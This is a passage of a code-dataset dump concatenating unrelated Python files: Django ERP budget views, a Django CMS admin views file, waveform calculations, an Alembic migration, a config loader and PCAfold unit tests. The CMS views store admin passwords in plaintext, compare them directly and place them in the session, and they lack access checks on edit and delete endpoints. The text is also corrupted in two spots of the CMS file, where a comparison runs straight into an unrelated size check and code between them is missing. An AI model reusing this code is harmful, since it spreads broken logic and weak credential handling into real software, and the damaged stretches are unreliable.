successfully.\",\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetPlanItemView(APIView):\n def get(self, request, id):\n budget_item = get_object_or_404(BudgetPlan, id=id)\n\n serializer = BudgetPlanSerializer(budget_item)\n\n return Response(serializer.data)\n\nclass BudgetPlanCreateListView(APIView):\n def get(self, request, id=None, collection=\"list\"):\n \"\"\"Returns budget plan using fiscal year id\n\n Args:\n request : Request information\n id (Int, optional): id for fiscal year to return fiscal year budget. Defaults to None.\n\n Returns:\n Response: Returns budget plan if id is specified or all budget plans list.\n \"\"\"\n data = None\n if id:\n if collection == \"list\":\n fiscal_year = get_object_or_404(FiscalYear, id=id)\n\n budget_plan = fiscal_year.budgetplan_set.all()\n\n serializer = BudgetPlanSerializer(budget_plan, many=True)\n\n data = serializer.data\n elif collection == \"category\":\n categories = BudgetPlan.objects.filter(fiscalYear__id=id).values(\n \"category\").annotate(Count(\"category\")).all()\n data = []\n for item in categories:\n category = item[\"category\"]\n data.append(\n {\n \"category\": category,\n \"items\": BudgetPlanSerializer(\n BudgetPlan.objects.filter(\n category=category).all(),\n many=True).data})\n else:\n budget_plans = BudgetPlan.objects.all()\n\n serializer = BudgetPlanSerializer(budget_plans, many=True)\n data = serializer.data\n\n return Response(data)\n\n @transaction.atomic(durable=True)\n def post(self, request, id):\n data = request.data\n fiscal_year = get_object_or_404(FiscalYear, id=id)\n\n item = data.get(\"item\")\n items = data.get(\"items\")\n\n if item:\n serializer = BudgetPlanSerializer(data=item)\n if serializer.is_valid():\n new_budget_item = BudgetPlan.objects.create(**item)\n new_budget_item.fiscalYear.add(fiscal_year)\n # new_budget_item.save()\n\n account_type = AccountType.objects.filter(\n name__contains=item[\"category\"]).first()\n\n if not account_type:\n return Response(\n data=\"Failed to set account.\",\n status=status.HTTP_400_BAD_REQUEST)\n\n new_sub_account = SubAccount.objects.create(\n name=\"Budget_Item_%s_%s\" % (\n new_budget_item.identifier,\n new_budget_item.name),\n opening_balance=0)\n new_sub_account.account_type.add(account_type)\n # new_sub_account.save()\n\n new_budget_item.save()\n\n new_sub_account.save()\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n elif items:\n serializer = BudgetPlanSerializer(data=items, many=True)\n if serializer.is_valid():\n for item in items:\n new_budget_item = BudgetPlan.objects.create(**item)\n new_budget_item.fiscalYear.add(fiscal_year)\n # new_budget_item.save()\n\n account_type = AccountType.objects.filter(\n name__contains=item[\"category\"]).first()\n\n if not account_type:\n return Response(\n data=\"Failed to set account.\",\n status=status.HTTP_400_BAD_REQUEST)\n\n new_sub_account = SubAccount.objects.create(\n name=\"Budget_Item_%s_%s\" % (\n new_budget_item.identifier,\n new_budget_item.name),\n opening_balance=0)\n new_sub_account.account_type.add(account_type)\n # new_sub_account.save()\n\n new_budget_item.save()\n\n new_sub_account.save()\n\n return Response(\n data=\"New budget item created succesfully\",\n status=status.HTTP_201_CREATED)\n else:\n # rollback()\n return Response(\n data=serializer.errors,\n 
status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetPlanByCategoryListView(APIView):\n def get(self, request, id, category):\n items = BudgetPlan.objects.filter(\n fiscalYear__id=id, category__contains=category).all()\n serializer = BudgetPlanSerializer(items, many=True)\n return Response(serializer.data)\n\n\nclass DraftBudgetPlanCreateRetrieveView(APIView):\n def get(self, request):\n budget_plan = DraftBudgetPlan.objects.all()\n\n categories = DraftBudgetPlan.objects.values(\n \"category\").annotate(Count(\"category\")).all()\n data = []\n for item in categories:\n category = item[\"category\"]\n data.append(\n {\n \"category\": category,\n \"items\": DraftBudgetPlanSerializer(\n DraftBudgetPlan.objects.filter(\n category=category).all(),\n many=True).data})\n\n return Response(data)\n\n def post(self, request):\n data = request.data\n\n # existing_budget_plan = DraftBudgetPlan.objects.first()\n # if existing_budget_plan:\n # return Response(\n # data=\"Cannot create new budget\",\n # status=status.HTTP_400_BAD_REQUEST)\n\n serializer = DraftBudgetPlanSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n def put(self, request, id):\n data = request.data\n\n serializer = DraftBudgetPlanSerializer(data=data)\n\n if serializer.is_valid():\n DraftBudgetPlan.objects.filter(id=id)\\\n .update(**serializer.data)\n return Response(\n data=serializer.data,\n status=status.HTTP_200_OK)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass FinancialDocumentsView(APIView):\n def get(self, request, document):\n if document == \"TRIAL_BALANCE\":\n data = SubAccount.objects.annotate(\n balance= Sum(\"accountsjournals__amount\"))\\\n .values(\n \"name\", \n \"balance\", \n account_type=\"account_type__name\")\n\n return Response(data)\n\n if document == \"INCOME_STATEMENT\":\n # net income = (Revenue + Gains) - (Expenses + Losses)\n data = SubAccount.objects.annotate(\n balance= Sum(\"accountsjournals__amount\"))\\\n .values(\n \"name\", \n \"balance\", \n account_type=\"account_type__name\")\\\n .filter(account_type__name__contains=[\"Revenue\", \"Expense\"])\n \n return Response(data)\n","repo_name":"samuelitwaru/wex-erp","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16029813607","text":"import math\nfrom datetime import datetime,date\nfrom django.shortcuts import render\nfrom cmsadmain.models import *\nfrom django.http import HttpResponse\nfrom common import returnResult\nfrom django.forms import forms\nfrom DjangoUeditor.forms import UEditorField\nfrom django.template.defaultfilters import striptags\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nimport json\n# Create your views here.\nclass TestUEditorForm(forms.Form):\n content = UEditorField('内容', width=700, height=400, toolbars=\"full\", imagePath=\"static/images/\", filePath=\"static/files/\", upload_settings={\"imageMaxSize\":1204000},settings={})\n\n######################主页\ndef home(request):\n #获取文章最大阅读数量\n list = news.objects.values(\"num\").order_by('-num')\n #文章数\n count = list.count()\n #今日登录用户\n todayuser = admain.objects.filter(lasttime=date.today()).count()\n #推荐位数\n positioncount = 
position.objects.all().count()\n print(list[0][\"num\"],count,todayuser)\n context = {\"newscount\":count,\"maxread\":list[0][\"num\"],\"todayuser\":todayuser,\"positioncount\":positioncount}\n return render(request,\"../templates/cmsadmain/home.html\",context)\n\ndef admainheader(request):\n del request.session['user']\n return HttpResponse(returnResult.returnResult(0, \"已退出,欢迎下次登录!\"))\ndef admainheaderHandler(request):\n # 获取session当前登录用户\n user = request.session[\"user\"]\n print(user)\n return HttpResponse(user)\n\n######################菜单管理\ndef menus(request):\n context = {}\n return render(request,\"../templates/cmsadmain/menu.html\",context)\n\ndef menusHandler(request):\n list = menu.objects.values(\"id\",\"menuname\",\"menutype\",\"menustate\")\n menulist = []\n if list.count()>0:\n for item in list:\n menulist.append(item)\n rs = json.dumps(menulist)\n return HttpResponse(rs)\n return HttpResponse(0)\n\n#添加菜单\ndef addmenu(request):\n context = {}\n return render(request,\"../templates/cmsadmain/addmenu.html\",context)\n\ndef addmenuHandler(request):\n if request.method == \"POST\":\n # 获取前端发送的数据\n name = request.POST.get(\"menuname\")\n type = request.POST.get(\"menutype\")\n state = request.POST.get(\"menustate\")\n print(name, type, state)\n #获取数据库判断添加的数据是否存在\n list = menu.objects.values(\"menuname\",\"menutype\").filter(menuname=name)\n for item in list:\n if item[\"menuname\"] == name and item[\"menutype\"] == type:\n rs = returnResult.returnResult(1, \"该栏目已存在!\")\n return HttpResponse(rs)\n\n #将数据存储到数据库\n obj = menu(menuname=name,menustate=state,menutype=type)\n obj.save()\n #向前端返回数据\n rs = returnResult.returnResult(0,\"添加成功!\")\n return HttpResponse(rs)\n\n#编辑菜单\ndef updatemenu(request):\n if request.method == \"POST\":\n id = request.POST.get(\"id\")\n list = menu.objects.values(\"menuname\",\"menutype\",\"menustate\").filter(id=id)\n dic = {}\n for item in list:\n dic = {\"menuname\":item[\"menuname\"],\"menutype\":item[\"menutype\"],\"menustate\":item[\"menustate\"]}\n str = json.dumps(dic)\n return HttpResponse(str)\n context = {}\n return render(request,\"../templates/cmsadmain/updatemenu.html\",context)\n\ndef updatemenuHandler(request):\n if request.method == \"POST\":\n # 获取前端发送的数据\n id = request.POST.get(\"menuid\")\n name = request.POST.get(\"menuname\")\n type = request.POST.get(\"menutype\")\n state = request.POST.get(\"menustate\")\n print(id,name, type, state)\n # 获取数据库判断添加的数据是否存在\n list = menu.objects.values(\"menuname\", \"menutype\",\"menustate\").filter(menuname=name)\n for item in list:\n if item[\"menuname\"] == name and item[\"menutype\"] == type and item[\"menustate\"] == state:\n rs = returnResult.returnResult(1, \"该栏目已存在!\")\n return HttpResponse(rs)\n\n # 将数据修改后存储到数据库\n menu.objects.filter(id = id).update(menuname=name,menutype=type,menustate=state)\n # 向前端返回数据\n rs = returnResult.returnResult(0, \"修改成功!\")\n return HttpResponse(rs)\n\n#删除菜单\ndef delmenu(request):\n id = request.POST.get(\"id\")\n print(id)\n menu.objects.filter(id = id).delete()\n return HttpResponse(0)\n\n\n######################文章管理页面\ndef article(request):\n #查询新闻表和菜单表\n newslist = news.objects.values(\"id\",\"catid\",\"title\",\"titlt_font_color\",\"thumb\",\"num\")\n menulist = menu.objects.values(\"id\",\"menuname\")\n positionlist = position.objects.values(\"id\",\"name\")\n dic = {}\n list = []\n dic2 = {}\n list2 = []\n #通过比较id得到新闻的所属栏目名\n for item in newslist:\n for item2 in menulist:\n if item[\"catid\"] == item2[\"id\"]:\n dic = 
{\"id\":item[\"id\"],\"title\":item[\"title\"],\"menu\":item2[\"menuname\"],\"thumb\":item[\"thumb\"],\"num\":item[\"num\"]}\n list.append(dic)\n #获取推送栏目的列表\n for item in positionlist:\n dic2 = {\"id\":item[\"id\"],\"name\":item[\"name\"]}\n list2.append(dic2)\n context = {\"news\":list,\"position\":list2}\n return render(request,\"../templates/cmsadmain/article.html\",context)\n\ndef articleHandler(request):\n return HttpResponse(0)\n\n#添加文章\ndef addarticle(request):\n list = menu.objects.values(\"menuname\",\"id\").filter(menutype=\"前台栏目\")\n menudic = {}\n menulist = []\n for item in list:\n menudic = {\"id\":item[\"id\"],\"menuname\":item[\"menuname\"]}\n menulist.append(menudic)\n form = TestUEditorForm()\n return render(request,\"../templates/cmsadmain/addarticle.html\",{\"form\":form,\"list\":menulist})\n\ndef addarticleHandler(request):\n title = request.POST.get(\"title\")\n titlecolor = request.POST.get(\"color\")\n newsmenu = request.POST.get(\"menu\")\n newsimg = request.FILES.get(\"newsimg\")\n content = striptags(request.POST.get(\"content\"))\n print(title, titlecolor, newsmenu, newsimg, content)\n #缩略图不存在\n if newsimg == None:\n #如果标题不存在\n if titlecolor == None:\n obj = news(catid=newsmenu,title=title,num=0,time=datetime.now())\n obj.save()\n else:\n obj = news(catid=newsmenu, title=title,num=0,titlt_font_color=titlecolor, time=datetime.now())\n obj.save()\n #获取刚存进去的新闻id\n list = news.objects.values(\"id\").filter(title=title).order_by('-id')\n #把文章内容存到数据库中\n obj2 = news_content(newsid=list[0][\"id\"],content=content)\n obj2.save()\n return HttpResponse(returnResult.returnResult(0,\"添加成功!\"))\n #缩略图存在\n if newsimg != None:\n # 判断上传过来的文件类型是否是项目需要的\n if newsimg.name.split(\".\")[-1] not in [\"jpg\", \"jpeg\", \"png\"]:\n return HttpResponse(returnResult.returnResult(1, \"添加失败,文件类型不正确\"))\n # 判断文件是否过大\n size = getsize(newsimg.size)\n print(size)\n if float(size) > 100:\n return HttpResponse(returnResult.returnResult(2, \"添加失败,文件过大!\"))\n\n # 创建文件名 以及指定到保存文件的路径\n filename = \"newsImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + newsimg.name.split(\".\")[-1]\n savePath = \"static/newsimg/\" + filename\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in newsimg.chunks():\n f.write(file)\n f.flush()\n # 存入数据库中\n #如果标题颜色不存在\n if titlecolor == None:\n obj = news(catid=newsmenu, title=title,num=0,thumb=filename, time=datetime.now())\n obj.save()\n else:\n obj = news(catid=newsmenu, title=title,num=0,titlt_font_color=titlecolor,thumb=filename, time=datetime.now())\n obj.save()\n # 获取刚存进去的新闻id\n list = news.objects.values(\"id\").filter(title=title).order_by('-id')\n # 把文章内容存到数据库中\n obj2 = news_content(newsid=list[0][\"id\"], content=content)\n obj2.save()\n return HttpResponse(returnResult.returnResult(0, \"添加成功!\"))\n\n#编辑文章\ndef updatearticle(request):\n #获取前端传过来的id\n newsid = request.GET.get(\"id\")\n #查询数据库\n newlist = news.objects.values(\"title\",\"titlt_font_color\",\"catid\",\"thumb\").filter(id = newsid)\n content = news_content.objects.values(\"content\").filter(newsid = newsid)\n #数据处理\n contentstr = \"\"\n dic = {}\n list = []\n for item in content:\n contentstr = item[\"content\"]\n for item2 in newlist:\n list = menu.objects.values(\"menuname\",\"id\").filter(menutype=\"前台栏目\")\n for item3 in list:\n if item2[\"catid\"] == item3[\"id\"]:\n dic = {\"title\":item2[\"title\"],\"titlecolor\":item2[\"titlt_font_color\"],\"menu\":item3[\"menuname\"],\"catid\":item2[\"catid\"],\"thumb\":item2[\"thumb\"],\"content\":contentstr}\n form = TestUEditorForm()\n 
return render(request,\"../templates/cmsadmain/updatearticle.html\",{\"form\":form,\"news\":dic,\"menulist\":list})\n\ndef updatearticleHandler(request):\n newsid = request.POST.get(\"newsid\")\n title = request.POST.get(\"title\")\n titlecolor = request.POST.get(\"color\")\n newsmenu = request.POST.get(\"menu\")\n newsimg = request.FILES.get(\"newsimg\")\n newcontent = striptags(request.POST.get(\"content\"))\n print(newcontent,newsid)\n # 缩略图不存在\n if newsimg == None:\n # 如果标题颜色不存在\n if titlecolor == None:\n news.objects.filter(id = newsid).update(catid=newsmenu, title=title,time=datetime.now())\n else:\n news.objects.filter(id = newsid).update(catid=newsmenu, title=title, titlt_font_color=titlecolor, time=datetime.now())\n # 把修改的文章内容存到数据库中\n if newcontent != \" 100:\n return HttpResponse(returnResult.returnResult(2, \"修改失败,文件过大!\"))\n\n # 创建文件名 以及指定到保存文件的路径\n filename = \"newsImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + newsimg.name.split(\".\")[-1]\n savePath = \"static/newsimg/\" + filename\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in newsimg.chunks():\n f.write(file)\n f.flush()\n # 存入数据库中\n # 如果标题颜色不存在\n if titlecolor == None:\n news.objects.filter(id = newsid).update(catid=newsmenu, title=title, thumb=filename, time=datetime.now())\n else:\n news.objects.filter(catid = newsmenu, title = title, titlt_font_color = titlecolor, thumb = filename, time = datetime.now())\n # 把文章内容存到数据库中\n if newcontent != \" 100:\n print(\"文件过大\")\n return\n # 判断上传过来的文件类型是否是项目需要的:\n if headImg.name.split(\".\")[-1] not in [\"jpg\", \"jpeg\", \"png\"]:\n print(\"文件类型不正确\")\n return\n # 把文件保存到指定的路径中\n # 比方说static/headImg\n # 创建文件名 以及指定到保存文件的路径\n filename = \"headImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + headImg.name.split(\".\")[-1]\n # print(\"filename------\",filename)\n savePath = \"static/headImg/\"+filename\n # print(\"savePath------\",savePath)\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in headImg.chunks():\n f.write(file)\n f.flush()\n # 判断用户名是否已经存在\n # 存在,提示该用户名已存在\n newusername=admain.objects.all()\n for item in newusername:\n # print(item.username)\n if username==item.username:\n return HttpResponse(returnResult.returnResult(1,\"该用户名已存在\"))\n newuser = admain(username=username, password=password,email=email, headimg=filename)\n newuser.save()\n return HttpResponse(returnResult.returnResult(0,\"添加成功\"))\n\n# 删除管理员信息\ndef deleteUser(request):\n deleteIndex=request.GET.get(\"deleteIndex\")\n admain.objects.filter(id=deleteIndex).delete()\n return HttpResponse(returnResult.returnResult(0, \"删除成功\"))\n\n# 编辑管理员信息\ndef reuser(request):\n form=TestUEditorForm()\n return render(request, \"../templates/cmsadmain/reuser.html\", {\"form\":form})\n\ndef editUser(request):\n editIndex = request.GET.get(\"editIndex\")\n # print(editIndex)\n list = admain.objects.values(\"username\", \"password\", \"email\", \"headimg\", \"resume\").get(id=editIndex)\n # print(list)\n return HttpResponse(returnResult.returnResult(0, \"删除成功\",list))\n\ndef resave(request):\n headImg = request.FILES.get(\"heading\")\n username = request.POST.get(\"username\")\n password = request.POST.get(\"pwd\")\n email = request.POST.get(\"email\")\n uid=request.POST.get(\"id\")\n print(uid)\n # print(\"头像名:\",headImg,\"用户名:\",username,\"密码:\",password,\"email:\",email)\n # 判断文件是否过大\n size = getsize(headImg.size)\n if float(size) > 100:\n print(\"文件过大\")\n return\n # 判断上传过来的文件类型是否是项目需要的:\n if headImg.name.split(\".\")[-1] not in [\"jpg\", \"jpeg\", \"png\"]:\n 
print(\"文件类型不正确\")\n return\n # 把文件保存到指定的路径中\n # 比方说static/headImg\n # 创建文件名 以及指定到保存文件的路径\n filename = \"headImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + headImg.name.split(\".\")[-1]\n # print(\"filename------\",filename)\n savePath = \"static/headImg/\" + filename\n # print(\"savePath------\",savePath)\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in headImg.chunks():\n f.write(file)\n f.flush()\n # 判断用户名是否已经存在\n # 存在,提示该用户名已存在\n newusername = admain.objects.all()\n for item in newusername:\n # print(item.username)\n if username == item.username:\n return HttpResponse(returnResult.returnResult(1, \"该用户名已存在\"))\n print(\"898\")\n admain.objects.filter(id=uid).update(username=username, password=password, email=email, headimg=filename)\n return HttpResponse(returnResult.returnResult(0, \"更改成功\"))\n\n\n# 富文本编辑器中添加头像,头像大小单位换算的方法\ndef getsize(size, format = 'kb'):\n p = 0\n if format == 'kb':\n p = 1\n elif format == 'mb':\n p = 2\n elif format == 'gb':\n p = 3\n size /= math.pow(1024, p)\n return \"%0.2f\"%size\n\n\n#################推荐位管理\ndef positions(request):\n list = position.objects.all()\n dic = {}\n li = []\n for item in list:\n dic = {\"id\":item.id,\"name\":item.name}\n li.append(dic)\n print(li)\n return render(request,\"../templates/cmsadmain/position.html\",{\"list\":li})\n\n#添加推荐位\ndef addposition(request):\n name = request.POST.get(\"name\")\n obj = position(name=name)\n obj.save()\n return HttpResponse(0)\n\n#编辑推荐位\ndef updataposition(request):\n id = request.POST.get(\"id\")\n list = position.objects.values(\"id\",\"name\").filter(id = id)\n dic = {}\n for item in list:\n dic = {\"title\":\"编辑推荐位\",\"name\":item[\"name\"],\"id\":item[\"id\"]}\n str = json.dumps(dic)\n return HttpResponse(str)\n\ndef updatepositionHandler(request):\n id = request.POST.get(\"id\")\n name = request.POST.get(\"name\")\n list = position.objects.values(\"name\").filter(id = id)\n for item in list:\n if name == item[\"name\"]:\n return HttpResponse(returnResult.returnResult(1,\"暂无修改!\"))\n else:\n position.objects.filter(id = id).update(name=name)\n return HttpResponse(returnResult.returnResult(0, \"修改成功!\"))\n\n#删除推荐位\ndef delposition(request):\n id = request.POST.get(\"id\")\n position.objects.filter(id = id).delete()\n return HttpResponse(returnResult.returnResult(0, \"删除成功!\"))\n\n#################推荐位内容管理\ndef positioncontent(request):\n # 查询推荐位内容表\n list1 = position_content.objects.values(\"positionid\", \"newsid\", \"id\")\n #查询推荐位表\n list2 = position.objects.values(\"name\",\"id\")\n # 查询新闻表\n list3 = news.objects.values(\"title\", \"thumb\",\"id\")\n\n # 数据处理\n dic = {}\n list = []\n for item1 in list1:\n for item2 in list2:\n if item1[\"positionid\"] == item2[\"id\"]:\n for item3 in list3:\n if item1[\"newsid\"] == item3[\"id\"]:\n dic = {\"PositionContentId\":item1[\"id\"],\"PositionName\":item2[\"name\"],\"title\":item3[\"title\"],\"thumb\":item3[\"thumb\"]}\n list.append(dic)\n return render(request,\"../templates/cmsadmain/positioncontent.html\",{\"list\":list})\n\n#添加推荐内容\ndef addpositioncontent(request):\n positionid = request.POST.get(\"positionid\")\n newsidlist = json.loads(request.POST.get(\"newsid\"))\n for item in newsidlist:\n print(item)\n obj = position_content(positionid=positionid,newsid=item)\n obj.save()\n return HttpResponse(returnResult.returnResult(0, \"添加成功!\"))\n\n#编辑推荐位内容\ndef updatepositioncontent(request):\n list = position.objects.values(\"id\",\"name\")\n dic = {}\n positionlist = []\n for item in list:\n dic = 
{\"id\":item[\"id\"],\"name\":item[\"name\"]}\n positionlist.append(dic)\n print(positionlist)\n str = json.dumps(positionlist)\n return HttpResponse(str)\n\ndef update_position_content_Handler(request):\n positionid = request.POST.get(\"positionid\")\n position_content_id = request.POST.get(\"positioncontentid\")\n print(positionid,position_content_id)\n #执行修改操作\n position_content.objects.filter(id=position_content_id).update(positionid=positionid)\n return HttpResponse(0)\n\n#删除推荐位内容\ndef del_position_content(request):\n position_content_id = request.POST.get(\"id\")\n print(position_content_id)\n position_content.objects.filter(id=position_content_id).delete()\n return HttpResponse(0)\n\n\n\n\n\n\n\n\n###################后台登录\ndef login(request):\n return render(request,\"../templates/cmsadmain/login.html\")\n\ndef loginHandler(request):\n username = request.POST.get(\"username\")\n pwd = request.POST.get(\"password\")\n #查询数据库\n list = admain.objects.values(\"username\",\"password\").filter(username=username)\n if list.count != 0:\n for item in list:\n if pwd == item[\"password\"]:\n #如果用户名密码通过验证,存入缓存中\n dic = {\"user\":username,\"pwd\":pwd}\n str = json.dumps(dic)\n request.session[\"user\"] = str\n #同时更新用户登录时间\n admain.objects.filter(username=username).update(lasttime=datetime.now())\n return HttpResponse(returnResult.returnResult(0, \"登录成功!\"))\n else:\n return HttpResponse(returnResult.returnResult(1, \"密码错误!\"))\n else:\n return HttpResponse(returnResult.returnResult(2, \"用户名不存在!\"))\n\n\n return HttpResponse(0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hjc2019/cms3","sub_path":"cmsadmain/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36147898522","text":"import os\nimport json\nimport pandas as pd\nimport numpy as np\nfrom numpy.fft import fft, ifft\n\n#Calculation of the slope of a waveform\ndef cal_slope(data):\n mean = np.nan\n stdev = np.nan\n slope = np.nan\n intercept = np.nan\n\n\n sum_x = 0\n sum_x2 = 0\n sum_xy = 0\n sum_y = 0\n mean = 0\n stdev = 0\n isum = 10000\n\n for i in range(0, 10000, 1):\n # the mean and standard deviation\n temp = data[i] - mean\n mean += temp / (i + 1)\n stdev += temp * (data[i] - mean)\n\n # linear regression\n sum_x += i\n sum_x2 += i * i\n sum_xy += data[i] * i\n sum_y += data[i]\n\n slope = (isum * sum_xy - sum_x * sum_y) / (isum * sum_x2 - sum_x * sum_x)\n intercept = (sum_y - sum_x * slope) / isum\n\n return float(slope), float(intercept)\n\n\n\ndef cal_length(data):\n wfLen = 0\n\n for i, wave in enumerate(data[\"waveform\"][\"values\"].nda[0:1000]):\n wfLen += len(wave)\n\n wfLen = wfLen/(i+1)\n\n return wfLen\n\ndef cal_MinMax(data):\n minVal = 66000\n maxVal = 0\n\n for i, wave in enumerate(data[\"waveform\"][\"values\"].nda[0:1000]):\n minCheck = np.min(wave)\n maxCheck = np.max(wave)\n if minCheck < minVal:\n minVal = minCheck\n if maxCheck > maxVal:\n maxVal = maxCheck\n\n return minVal, maxVal\n\n\n#I have not settled on an algorithim for this,\n# but it is more checking the correct answer.\ndef cal_Duplicate(data):\n duplicateLong = 0\n\n \n uniqArr = np.unique(data[\"waveform\"][\"values\"].nda, axis=0)\n duplicateLong = len(data[\"waveform\"][\"values\"].nda) - len(uniqArr)\n\n return duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong, duplicateLong \n \ndef cal_baseRMS(data):\n rmsArr = 
np.zeros(len(data[\"waveform\"][\"values\"].nda))\n for i,wave in enumerate(data[\"waveform\"][\"values\"].nda):\n rmsArr[i] = np.sqrt(np.mean(wave[0:1000]**2))\n\n rms = np.mean(rmsArr)\n\n return rms\n\n \ndef cal_fft(data):\n sr = 125000000\n fft1 = fft(data[\"waveform\"][\"values\"].nda[0][0:150000])\n N = len(fft1)\n n = np.arange(N)\n T = N/sr\n freq1 = n/T\n pow1 = np.abs(fft1)**2\n\n return fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1, fft1, freq1,\n\n\n","repo_name":"jbrowni2/graphanaGemini","sub_path":"calculations/rawDataCal.py","file_name":"rawDataCal.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32187301292","text":"\"\"\"empty message\n\nRevision ID: efd76e8acb8e\nRevises: 469c3c751421\nCreate Date: 2020-11-06 00:14:10.153407\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'efd76e8acb8e'\ndown_revision = '469c3c751421'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('comment',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.String(length=400), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('media',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('media_type', sa.Enum('VIDEO', 'PHOTO', name='mediatype'), nullable=False),\n sa.Column('url', sa.String(length=120), nullable=False),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('user', sa.Column('last', sa.String(length=80), nullable=False))\n op.add_column('user', sa.Column('name', sa.String(length=80), nullable=False))\n op.add_column('user', sa.Column('username', sa.String(length=80), nullable=False))\n op.create_unique_constraint(None, 'user', ['username'])\n op.drop_column('user', 'is_active')\n op.drop_column('user', 'password')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('user', sa.Column('password', mysql.VARCHAR(length=80), nullable=False))\n op.add_column('user', sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False))\n op.drop_constraint(None, 'user', type_='unique')\n op.drop_column('user', 'username')\n op.drop_column('user', 'name')\n op.drop_column('user', 'last')\n op.drop_table('media')\n op.drop_table('comment')\n op.drop_table('post')\n # ### end Alembic commands ###\n","repo_name":"sergioadll/instagram-database","sub_path":"migrations/versions/efd76e8acb8e_.py","file_name":"efd76e8acb8e_.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22182795760","text":"import locale\nfrom configparser import ConfigParser\n#detect system language\nif(\"pl\" in locale.getdefaultlocale()[0].lower()):\n\tfrom strings_pl import *\nelse:\n\tfrom strings_en import *\n#version number\nstring_version=\"v0010\"\n#API endpoint\nparser = ConfigParser()\nparser.read('props.ini')\ntry:\n\tstring_api=parser[\"ACCOUNT\"][\"api\"]\nexcept:\n\tstring_api=\"http://bajton.vlo.gda.pl/api/\"\nprint(\"[INFO] Using API endpoint:\",string_api)","repo_name":"PetrusTryb/bajton-helper","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73285385449","text":"import unittest\nimport numpy as np\nfrom PCAfold import preprocess\nfrom PCAfold import reduction\nfrom PCAfold import analysis\n\nclass Preprocess(unittest.TestCase):\n\n def test_preprocess__get_partition__allowed_calls(self):\n\n pass\n\n# ------------------------------------------------------------------------------\n\n def test_preprocess__get_parition__not_allowed_calls(self):\n\n X = np.random.rand(100,10)\n idx = np.zeros((90,))\n\n with self.assertRaises(ValueError):\n (x_in_clusters, idx_in_clusters) = preprocess.get_partition(X, idx)\n\n X = np.random.rand(100,10)\n idx = np.zeros((110,))\n\n with self.assertRaises(ValueError):\n (x_in_clusters, idx_in_clusters) = preprocess.get_partition(X, idx)\n\n# ------------------------------------------------------------------------------\n\n def test_preprocess__get_partition__computation(self):\n\n try:\n x = np.array([[1,2,10],[1,2,10],[1,2,10]])\n idx = np.array([0,0,0])\n pre_x_in_clusters = [np.array([[1,2,10],[1,2,10],[1,2,10]])]\n pre_idx_in_clusters = [np.array([0,1,2])]\n (x_in_clusters, idx_in_clusters) = preprocess.get_partition(x, idx)\n comparison_1 = (pre_x_in_clusters[0] == x_in_clusters[0])\n self.assertTrue(comparison_1.all())\n comparison_2 = (pre_idx_in_clusters[0] == idx_in_clusters[0])\n self.assertTrue(comparison_2.all())\n except Exception:\n self.assertTrue(False)\n\n try:\n x = np.array([[1,2,10],[1,2,10],[30,40,50]])\n idx = np.array([0,0,1])\n pre_x_in_clusters = [np.array([[1,2,10],[1,2,10]]), np.array([[30,40,50]])]\n pre_idx_in_clusters = [np.array([0,1]), np.array([2])]\n (x_in_clusters, idx_in_clusters) = 